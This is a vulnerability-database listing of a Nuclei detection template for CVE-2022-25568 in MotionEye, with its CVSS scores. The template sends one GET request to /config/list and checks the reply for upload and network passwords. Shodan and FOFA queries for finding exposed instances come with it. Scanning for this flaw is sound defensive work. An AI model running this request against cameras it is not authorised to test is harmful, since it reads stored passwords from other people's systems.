Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-25568
HistoryOct 10, 2023 - 9:01 p.m.

MotionEye Config Info Disclosure

2023-10-1021:01:40
ProjectDiscovery
github.com
1
cve
cve2022
motioneye
config
motioneye_project
info_disclosure
web_vulnerability

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.015 Low

EPSS

Percentile

87.0%

MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
id: CVE-2022-25568

info:
  name: MotionEye Config Info Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
  reference:
    - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/
    - https://github.com/ccrisan/motioneye/issues/2292
    - https://nvd.nist.gov/vuln/detail/cve-2022-25568
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-25568
    cwe-id: CWE-1188
    epss-score: 0.01501
    epss-percentile: 0.86918
    cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: motioneye_project
    product: motioneye
    shodan-query:
      - html:"MotionEye"
      - http.html:"motioneye"
    fofa-query: body="motioneye"
  tags: cve,cve2022,motioneye,config,motioneye_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/list"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "upload_password"
          - "network_password"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402200cb966e799aa6b403708300915ce27d6169f114e4f30a6c02f39223539c03a4802201e5a78c7f8cb76d6b71843af7a1637b192ca9646689c926ae101fc490f535516:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.015 Low

EPSS

Percentile

87.0%

Related for NUCLEI:CVE-2022-25568